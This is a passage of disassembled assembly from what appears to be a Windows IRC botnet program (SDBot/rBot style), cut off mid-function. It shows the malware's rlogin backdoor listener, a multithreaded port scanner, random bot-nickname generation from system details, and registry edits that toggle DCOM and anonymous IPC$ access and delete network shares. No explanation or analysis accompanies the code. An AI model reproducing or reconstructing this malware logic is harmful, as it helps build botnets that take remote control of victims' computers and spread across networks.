lea eax, [ebp+var_5A8]
push eax
push 202h
call dword_43A3AC ; WSAStartup
xor ebx, ebx
cmp eax, ebx
jz short loc_410B59
push eax
push offset aRlogindErrorWs ; "[RLOGIND]: Error: WSAStartup(): <%d>."
call sub_401F41
push [ebp+var_50]
call sub_41397A
add esp, 0Ch
loc_410B53: ; CODE XREF: sub_410B00+8B�j
push esi
jmp loc_410D75
; ---------------------------------------------------------------------------
loc_410B59: ; CODE XREF: sub_410B00+3B�j
push esi
push offset sub_41089D
call dword_422118 ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_410B8D
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_0 ; "[RLOGIND]: Failed to install control-C "...
call sub_401F41
pop ecx
pop ecx
call dword_43A4BC ; WSACleanup
push [ebp+var_50]
call sub_41397A
pop ecx
jmp short loc_410B53
; ---------------------------------------------------------------------------
loc_410B8D: ; CODE XREF: sub_410B00+67�j
push [ebp+var_54]
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_24], 2
call dword_43A4F4 ; ntohs
push 6
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_43A39C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_410D05
mov ecx, [ebp+var_50]
imul ecx, 234h
push 10h
pop edi
mov dword_43B24C[ecx], eax
push edi
lea ecx, [ebp+var_24]
push ecx
push eax
call dword_43A47C ; bind
test eax, eax
jnz loc_410D05
push 7FFFFFFFh
push [ebp+arg_0]
call dword_43A4C8 ; listen
test eax, eax
jnz loc_410D05
push offset aRlogindReadyAn ; "[RLOGIND]: Ready and waiting for incomi"...
mov [ebp+var_14], 0Ch
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_401ECD
pop ecx
mov [ebp+var_8], esi
jmp loc_410CE4
; ---------------------------------------------------------------------------
loc_410C1F: ; CODE XREF: sub_410B00+1FD�j
push [ebp+var_8]
lea eax, [ebp+var_8]
push eax
push 8
push 0FFFFh
push esi
call dword_43A3B8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_410CE4
push [ebp+var_50]
movzx eax, [ebp+var_32]
push eax
push [ebp+var_30]
mov [ebp+var_3C], ebx
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+var_418]
push offset aRlogindClientC ; "[RLOGIND]: Client connection from IP: %"...
push eax
call sub_416905
lea eax, [ebp+var_418]
push eax
call sub_401ECD
push esi
lea eax, [ebp+var_418]
push 7
push eax
call sub_4136B6
mov ecx, [ebp+var_50]
mov [ebp+var_4C], eax
imul eax, 234h
add esp, 24h
mov dword_43B244[eax], ecx
lea eax, [ebp+var_38]
push eax
push ebx
lea eax, [ebp+var_218]
push eax
push offset sub_4108F4
push ebx
lea eax, [ebp+var_14]
push eax
call dword_422008 ; CreateThread
mov ecx, [ebp+var_4C]
imul ecx, 234h
cmp eax, ebx
mov dword_43B254[ecx], eax
jnz short loc_410CDF
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_1 ; "[RLOGIND]: Failed to start client threa"...
call sub_401F41
pop ecx
pop ecx
jmp short loc_410D08
; ---------------------------------------------------------------------------
loc_410CD7: ; CODE XREF: sub_410B00+1E2�j
push 32h
call dword_422000 ; Sleep
loc_410CDF: ; CODE XREF: sub_410B00+1C0�j
cmp [ebp+var_3C], ebx
jz short loc_410CD7
loc_410CE4: ; CODE XREF: sub_410B00+11A�j
; sub_410B00+137�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
mov [ebp+var_4], edi
call dword_43A35C ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz loc_410C1F
jmp short loc_410D08
; ---------------------------------------------------------------------------
loc_410D05: ; CODE XREF: sub_410B00+BD�j
; sub_410B00+E3�j ...
mov esi, [ebp+arg_0]
loc_410D08: ; CODE XREF: sub_410B00+1D5�j
; sub_410B00+203�j
call dword_43A45C ; WSAGetLastError
push eax
lea eax, [ebp+var_418]
push offset aRlogindError_0 ; "[RLOGIND]: Error: server failed, return"...
push eax
call sub_416905
add esp, 0Ch
cmp [ebp+var_40], ebx
jnz short loc_410D48
push ebx
push [ebp+var_44]
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_214]
push eax
push [ebp+var_218]
call sub_405D20
add esp, 14h
loc_410D48: ; CODE XREF: sub_410B00+226�j
lea eax, [ebp+var_418]
push eax
call sub_401ECD
pop ecx
push esi
call dword_43A4B0 ; closesocket
push [ebp+arg_0]
call dword_43A4B0 ; closesocket
call dword_43A4BC ; WSACleanup
push [ebp+var_50]
call sub_41397A
pop ecx
push ebx
loc_410D75: ; CODE XREF: sub_410B00+54�j
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_410B00 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_410D7C proc near ; CODE XREF: sub_411098+6C�p
; DATA XREF: .text:off_4301B8�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call dword_42201C ; GetTickCount
push eax
call sub_41698D
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aSoul ; "[SOUL]"
push offset aS_3 ; "%s"
push 1Ch
push edi
call sub_416B5D
xor esi, esi
add esp, 10h
cmp dword_42FCD8, esi
jle short loc_410DD5
loc_410DAF: ; CODE XREF: sub_410D7C+57�j
call sub_41699A
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_416B5D
add esp, 14h
inc esi
cmp esi, dword_42FCD8
jl short loc_410DAF
loc_410DD5: ; CODE XREF: sub_410D7C+31�j
mov eax, edi
pop edi
pop esi
retn
sub_410D7C endp
; =============== S U B R O U T I N E =======================================
sub_410DDA proc near ; CODE XREF: sub_409806+3305�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call dword_42201C ; GetTickCount
push eax
call sub_41698D
pop ecx
call sub_41699A
push 3
cdq
pop ecx
idiv ecx
mov ebx, [esp+0Ch+arg_0]
xor edi, edi
mov esi, edx
add esi, dword_42FCD8
test esi, esi
jle short loc_410E1D
loc_410E07: ; CODE XREF: sub_410DDA+41�j
call sub_41699A
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_410E07
loc_410E1D: ; CODE XREF: sub_410DDA+2B�j
and byte ptr [edi+ebx], 0
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_410DDA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov dword ptr [ebp-4], 100h
call dword_42201C ; GetTickCount
push eax
call sub_41698D
pop ecx
lea eax, [ebp-4]
push eax
mov esi, offset aPc ; "PC"
push esi
call dword_4220DC ; GetComputerNameA
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_416B5D
xor esi, esi
add esp, 0Ch
cmp dword_42FCD8, esi
jle short loc_410E90
loc_410E6A: ; CODE XREF: .text:00410E8E�j
call sub_41699A
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_416B5D
add esp, 14h
inc esi
cmp esi, dword_42FCD8
jl short loc_410E6A
loc_410E90: ; CODE XREF: .text:00410E68�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call dword_42201C ; GetTickCount
push eax
call sub_41698D
pop ecx
push 0Ah
lea eax, [ebp-0Ch]
push eax
push 7
push 800h
call dword_42211C ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset aS_1 ; "%s|"
push 1Ch
push edi
call sub_416B5D
xor esi, esi
add esp, 10h
cmp dword_42FCD8, esi
jle short loc_410F05
loc_410EDF: ; CODE XREF: .text:00410F03�j
call sub_41699A
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_416B5D
add esp, 14h
inc esi
cmp esi, dword_42FCD8
jl short loc_410EDF
loc_410F05: ; CODE XREF: .text:00410EDD�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-74h]
sub esp, 94h
push esi
push edi
lea eax, [ebp-20h]
push eax
mov esi, 422B0Ah
mov dword ptr [ebp-20h], 94h
call dword_422120 ; GetVersionExA
call dword_42201C ; GetTickCount
push eax
call sub_41698D
cmp dword ptr [ebp-1Ch], 4
pop ecx
jnz short loc_410F79
cmp dword ptr [ebp-18h], 0
jnz short loc_410F5F
cmp dword ptr [ebp-10h], 1
jnz short loc_410F52
mov esi, offset a95 ; "95"
loc_410F52: ; CODE XREF: .text:00410F4B�j
cmp dword ptr [ebp-10h], 2
jnz short loc_410FA9
mov esi, offset aNt ; "NT"
jmp short loc_410FA9
; ---------------------------------------------------------------------------
loc_410F5F: ; CODE XREF: .text:00410F45�j
cmp dword ptr [ebp-18h], 0Ah
jnz short loc_410F6C
mov esi, offset a98 ; "98"
jmp short loc_410FA9
; ---------------------------------------------------------------------------
loc_410F6C: ; CODE XREF: .text:00410F63�j
cmp dword ptr [ebp-18h], 5Ah
jnz short loc_410FA4
mov esi, offset aMe_0 ; "ME"
jmp short loc_410FA9
; ---------------------------------------------------------------------------
loc_410F79: ; CODE XREF: .text:00410F3F�j
cmp dword ptr [ebp-1Ch], 5
jnz short loc_410FA4
cmp dword ptr [ebp-18h], 0
jnz short loc_410F8C
mov esi, offset a2k ; "2K"
jmp short loc_410FA9
; ---------------------------------------------------------------------------
loc_410F8C: ; CODE XREF: .text:00410F83�j
cmp dword ptr [ebp-18h], 1
jnz short loc_410F99
mov esi, offset aXp_0 ; "XP"
jmp short loc_410FA9
; ---------------------------------------------------------------------------
loc_410F99: ; CODE XREF: .text:00410F90�j
cmp dword ptr [ebp-18h], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_410FA9
loc_410FA4: ; CODE XREF: .text:00410F70�j
; .text:00410F7D�j
mov esi, offset a??? ; "???"
loc_410FA9: ; CODE XREF: .text:00410F56�j
; .text:00410F5D�j ...
mov edi, [ebp+7Ch]
push esi
push offset aS_7 ; "[%s]|"
push 1Ch
push edi
call sub_416B5D
xor esi, esi
add esp, 10h
cmp dword_42FCD8, esi
jle short loc_410FED
loc_410FC7: ; CODE XREF: .text:00410FEB�j
call sub_41699A
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_416B5D
add esp, 14h
inc esi
cmp esi, dword_42FCD8
jl short loc_410FC7
loc_410FED: ; CODE XREF: .text:00410FC5�j
mov eax, edi
pop edi
pop esi
add ebp, 74h
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410FF6 proc near ; CODE XREF: sub_411098+80�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call dword_42201C ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
call dword_43A3F8 ; FindWindowA
cmp esi, 64h
jbe short loc_411045
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_41102E
mov eax, 422B0Ah
loc_41102E: ; CODE XREF: sub_410FF6+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_416B5D
add esp, 14h
jmp short loc_41105F
; ---------------------------------------------------------------------------
loc_411045: ; CODE XREF: sub_410FF6+28�j
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_411053
mov eax, 422B0Ah
loc_411053: ; CODE XREF: sub_410FF6+56�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_416905
pop ecx
pop ecx
loc_41105F: ; CODE XREF: sub_410FF6+4D�j
lea eax, [ebp+var_1C]
lea edx, [eax+1]
pop esi
loc_411066: ; CODE XREF: sub_410FF6+75�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411066
sub eax, edx
cmp eax, 2
jbe short loc_411093
push 1Ch
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
call sub_4167D0
push 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_4169C0
add esp, 18h
loc_411093: ; CODE XREF: sub_410FF6+7C�j
mov eax, [ebp+arg_0]
leave
retn
sub_410FF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411098 proc near ; CODE XREF: sub_40942B+53�p
; sub_4096A7+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
xor edx, edx
xor edi, edi
loc_4110A2: ; CODE XREF: sub_411098+62�j
mov esi, [ebp+arg_C]
test esi, esi
jz short loc_4110E1
lea eax, dword_4301A8[edi]
loc_4110AF: ; CODE XREF: sub_411098+33�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_4110D1
test cl, cl
jz short loc_4110CD
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_4110D1
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_4110AF
loc_4110CD: ; CODE XREF: sub_411098+21�j
xor eax, eax
jmp short loc_4110D6
; ---------------------------------------------------------------------------
loc_4110D1: ; CODE XREF: sub_411098+1D�j
; sub_411098+2B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4110D6: ; CODE XREF: sub_411098+37�j
xor ecx, ecx
test eax, eax
setz cl
mov eax, ecx
jmp short loc_4110EF
; ---------------------------------------------------------------------------
loc_4110E1: ; CODE XREF: sub_411098+F�j
mov ecx, dword_4301B4[edi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_4110EF: ; CODE XREF: sub_411098+47�j
test eax, eax
jnz short loc_4110FE
add edi, 14h
inc edx
cmp edi, 64h
jb short loc_4110A2
jmp short loc_41110C
; ---------------------------------------------------------------------------
loc_4110FE: ; CODE XREF: sub_411098+59�j
push [ebp+arg_0]
lea eax, [edx+edx*4]
call off_4301B8[eax*4]
pop ecx
loc_41110C: ; CODE XREF: sub_411098+64�j
cmp [ebp+arg_8], 0
pop edi
pop esi
pop ebx
jz short loc_411120
push [ebp+arg_0]
call sub_410FF6
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_411120: ; CODE XREF: sub_411098+7B�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_411098 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_411125 proc near ; DATA XREF: sub_4111E7+77�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0B8h
mov eax, [ebp+74h+arg_0]
push esi
push edi
mov esi, eax
push 2Ah
pop ecx
lea edi, [ebp+74h+var_B8]
rep movsd
push [ebp+74h+var_34]
xor esi, esi
inc esi
mov [eax+0A4h], esi
xor eax, eax
lea edi, [ebp+74h+var_10]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_10], 2
call dword_43A4F4 ; ntohs
push 6
mov [ebp+74h+var_E], ax
mov eax, [ebp+74h+var_28]
push esi
push 2
mov [ebp+74h+var_C], eax
call dword_43A39C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4111D5
push 10h
lea eax, [ebp+74h+var_10]
push eax
push esi
call dword_43A34C ; connect
mov ecx, [ebp+74h+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_43B24C[ecx], esi
jz short loc_4111D5
push [ebp+74h+var_34]
push [ebp+74h+var_28]
call dword_43A420 ; inet_ntoa
push eax
push offset aScanIpSPortD_0 ; "[SCAN]: IP: %s Port: %d is open."
mov edi, offset dword_480B20
push edi
call sub_416905
push 0
push [ebp+74h+var_20]
lea eax, [ebp+74h+var_B4]
push edi
push eax
push [ebp+74h+var_B8]
call sub_405D20
push edi
call sub_401ECD
add esp, 28h
loc_4111D5: ; CODE XREF: sub_411125+55�j
; sub_411125+76�j
push esi
call dword_43A4B0 ; closesocket
pop edi
xor eax, eax
pop esi
add ebp, 74h
leave
retn 4
sub_411125 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_4111E7 proc near ; DATA XREF: sub_409806+297B�o
var_12C = byte ptr -12Ch
var_AC = byte ptr -0ACh
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 12Ch
push ebx
mov ebx, [ebp+74h+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, ebx
lea edi, [ebp+74h+var_AC]
rep movsd
mov esi, dword_422000
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_411214: ; CODE XREF: sub_4111E7+C1�j
push [ebp+74h+var_28]
push [ebp+74h+var_1C]
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_12C]
push offset aScanScanningIp ; "[SCAN]: Scanning IP: %s, Port: %d."
push eax
call sub_416905
push 1FFh
lea eax, [ebp+74h+var_12C]
push eax
mov eax, [ebp+74h+var_20]
imul eax, 234h
add eax, offset dword_43B040
push eax
call sub_4169C0
add esp, 1Ch
lea eax, [ebp+74h+var_4]
push eax
push edi
lea eax, [ebp+74h+var_AC]
push eax
push offset sub_411125
push edi
push edi
call dword_422008 ; CreateThread
cmp eax, edi
mov [ebp+74h+arg_0], eax
jz short loc_41127D
jmp short loc_411278
; ---------------------------------------------------------------------------
loc_411274: ; CODE XREF: sub_4111E7+94�j
push 32h
call esi ; Sleep
loc_411278: ; CODE XREF: sub_4111E7+8B�j
cmp [ebp+74h+var_8], edi
jz short loc_411274
loc_41127D: ; CODE XREF: sub_4111E7+89�j
push [ebp+74h+arg_0]
call dword_42202C ; CloseHandle
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
push [ebp+74h+var_1C]
call dword_43A474 ; ntohl
inc eax
push eax
call dword_43A4CC ; ntohl
mov [ebp+74h+var_1C], eax
jmp loc_411214
sub_4111E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4112AD proc near ; CODE XREF: sub_4118ED+8�p
; sub_41190B+37�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_43A508, edi
jnz loc_4113E0
lea eax, [ebp+var_4]
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_43A4D0 ; RegOpenKeyExA
test eax, eax
jnz short loc_411339
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 4Eh
lea edx, [eax+1]
loc_4112F1: ; CODE XREF: sub_4112AD+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4112F1
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_43A380 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_411321
push offset aSecureDisableD ; "[SECURE]: Disable DCOM failed."
jmp short loc_411326
; ---------------------------------------------------------------------------
loc_411321: ; CODE XREF: sub_4112AD+6B�j
push offset aSecureDcomDisa ; "[SECURE]: DCOM disabled."
loc_411326: ; CODE XREF: sub_4112AD+72�j
push eax
call sub_416905
pop ecx
pop ecx
push [ebp+var_4]
call dword_43A480 ; RegCloseKey
jmp short loc_41134C
; ---------------------------------------------------------------------------
loc_411339: ; CODE XREF: sub_4112AD+36�j
lea eax, [ebp+var_214]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_416905
pop ecx
pop ecx
loc_41134C: ; CODE XREF: sub_4112AD+8A�j
cmp [ebp+arg_C], edi
jnz short loc_41136B
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_41136B: ; CODE XREF: sub_4112AD+A2�j
lea eax, [ebp+var_214]
push eax
call sub_401ECD
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_43A4D0 ; RegOpenKeyExA
test eax, eax
jnz short loc_4113D9
push 4
lea eax, [ebp+var_8]
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_43A380 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_4113C1
push offset aSecureFailed_1 ; "[SECURE]: Failed to restrict access to "...
jmp short loc_4113C6
; ---------------------------------------------------------------------------
loc_4113C1: ; CODE XREF: sub_4112AD+10B�j
push offset aSecureRestrict ; "[SECURE]: Restricted access to the IPC$"...
loc_4113C6: ; CODE XREF: sub_4112AD+112�j
push eax
call sub_416905
pop ecx
pop ecx
push [ebp+var_4]
call dword_43A480 ; RegCloseKey
jmp short loc_4113F3
; ---------------------------------------------------------------------------
loc_4113D9: ; CODE XREF: sub_4112AD+E3�j
push offset aSecureFailed_2 ; "[SECURE]: Failed to open IPC$ Restricti"...
jmp short loc_4113E5
; ---------------------------------------------------------------------------
loc_4113E0: ; CODE XREF: sub_4112AD+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_4113E5: ; CODE XREF: sub_4112AD+131�j
lea eax, [ebp+var_214]
push eax
call sub_416905
pop ecx
pop ecx
loc_4113F3: ; CODE XREF: sub_4112AD+12A�j
cmp [ebp+arg_C], edi
jnz short loc_411412
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_411412: ; CODE XREF: sub_4112AD+149�j
lea eax, [ebp+var_214]
push eax
call sub_401ECD
cmp dword_43A530, edi
pop ecx
jnz loc_41158F
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
push ebx
loc_411435: ; CODE XREF: sub_4112AD+2C6�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push edi
call dword_43A4A4
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_4114D4
cmp eax, 0EAh
jz short loc_4114D4
xor esi, esi
loc_411463: ; CODE XREF: sub_4112AD+220�j
push off_430210[esi]
push edi
call sub_407C51
pop ecx
pop ecx
push off_430210[esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_411488
push offset aSecureShareSDe ; "[SECURE]: Share '%s' deleted."
jmp short loc_41148D
; ---------------------------------------------------------------------------
loc_411488: ; CODE XREF: sub_4112AD+1D2�j
push offset aSecureFailed_3 ; "[SECURE]: Failed to delete '%s' share."
loc_41148D: ; CODE XREF: sub_4112AD+1D9�j
push 200h
push eax
call sub_416B5D
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_4114BA
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_4114BA: ; CODE XREF: sub_4112AD+1F1�j
lea eax, [ebp+var_214]
push eax
call sub_401ECD
add esi, 8
cmp esi, 20h
pop ecx
jb short loc_411463
jmp loc_41156C
; ---------------------------------------------------------------------------
loc_4114D4: ; CODE XREF: sub_4112AD+1AB�j
; sub_4112AD+1B2�j
mov esi, [ebp+var_8]
xor ebx, ebx
inc ebx
cmp [ebp+var_4], ebx
jb loc_411563
loc_4114E3: ; CODE XREF: sub_4112AD+2B2�j
mov edi, [esi]
push edi
call sub_417ECE
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_411558
push edi
call sub_407B65
push eax
push 0
call sub_407C51
add esp, 0Ch
push dword ptr [esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_411518
push offset aSecureShareS_0 ; "[SECURE]: Share '%S' deleted."
jmp short loc_41151D
; ---------------------------------------------------------------------------
loc_411518: ; CODE XREF: sub_4112AD+262�j
push offset aSecureFailed_4 ; "[SECURE]: Failed to delete '%S' share."
loc_41151D: ; CODE XREF: sub_4112AD+269�j
push 200h
push eax
call sub_416B5D
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41154B
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_41154B: ; CODE XREF: sub_4112AD+282�j
lea eax, [ebp+var_214]
push eax
call sub_401ECD
pop ecx
loc_411558: ; CODE XREF: sub_4112AD+245�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_4114E3
xor edi, edi
loc_411563: ; CODE XREF: sub_4112AD+230�j
push [ebp+var_8]
call dword_43A3D8
loc_41156C: ; CODE XREF: sub_4112AD+222�j
cmp [ebp+var_10], 0EAh
jz loc_411435
lea eax, [ebp+var_214]
push offset aSecureNetworkS ; "[SECURE]: Network shares deleted."
push eax
call sub_416905
pop ecx
pop ecx
pop ebx
jmp short loc_4115A2
; ---------------------------------------------------------------------------
loc_41158F: ; CODE XREF: sub_4112AD+178�j
lea eax, [ebp+var_214]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_416905
pop ecx
pop ecx
loc_4115A2: ; CODE XREF: sub_4112AD+2E0�j
cmp [ebp+arg_C], edi
jnz short loc_4115C0
push edi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_4115C0: ; CODE XREF: sub_4112AD+2F8�j
lea eax, [ebp+var_214]
push eax
call sub_401ECD
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_4112AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4115D4 proc near ; CODE XREF: sub_41190B:loc_411949�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_43A508, ebx
push esi
jnz loc_411703
lea eax, [ebp+var_4]
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_43A4D0 ; RegOpenKeyExA
test eax, eax
jnz short loc_411660
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 59h
lea edx, [eax+1]
loc_411618: ; CODE XREF: sub_4115D4+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411618
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_43A380 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_411648
push offset aSecureEnableDc ; "[SECURE]: Enable DCOM failed."
jmp short loc_41164D
; ---------------------------------------------------------------------------
loc_411648: ; CODE XREF: sub_4115D4+6B�j
push offset aSecureDcomEnab ; "[SECURE]: DCOM enabled."
loc_41164D: ; CODE XREF: sub_4115D4+72�j
push eax
call sub_416905
pop ecx
pop ecx
push [ebp+var_4]
call dword_43A480 ; RegCloseKey
jmp short loc_411673
; ---------------------------------------------------------------------------
loc_411660: ; CODE XREF: sub_4115D4+36�j
lea eax, [ebp+var_220]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_416905
pop ecx
pop ecx
loc_411673: ; CODE XREF: sub_4115D4+8A�j
cmp [ebp+arg_C], ebx
jnz short loc_411692
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_411692: ; CODE XREF: sub_4115D4+A2�j
lea eax, [ebp+var_220]
push eax
call sub_401ECD
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_43A4D0 ; RegOpenKeyExA
test eax, eax
jnz short loc_4116FC
push 4
lea eax, [ebp+var_8]
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call dword_43A380 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_4116E4
push offset aSecureFailed_5 ; "[SECURE]: Failed to unrestrict access t"...
jmp short loc_4116E9
; ---------------------------------------------------------------------------
loc_4116E4: ; CODE XREF: sub_4115D4+107�j
